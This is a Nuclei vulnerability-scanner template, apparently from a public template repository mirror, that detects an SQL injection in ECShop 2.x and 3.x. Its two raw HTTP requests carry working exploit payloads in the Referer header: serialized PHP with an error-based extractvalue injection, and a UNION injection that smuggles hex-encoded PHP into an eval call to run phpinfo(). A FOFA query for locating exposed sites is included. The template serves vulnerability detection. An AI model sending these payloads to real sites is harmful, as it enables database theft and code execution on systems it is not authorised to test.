daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/other/ecshop-sqli.yaml

55 lines
2.1 KiB
YAML
Raw Blame History

id: ecshop-sqli
info:
name: ECShop 2.x/3.x - SQL Injection
author: Lark-lab,ImNightmaree,ritikchaddha
severity: critical
description: |
ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
- https://www.shutingrz.com/post/ad_hack-ec_exploit/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
metadata:
verified: true
fofa-query: app="ECShop"
tags: sqli,php,ecshop
requests:
- raw:
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- 'XPATH syntax error:'
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
condition: and
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
# Enhanced by mp on 2022/09/28
Reference in New Issue View Git Blame Copy Permalink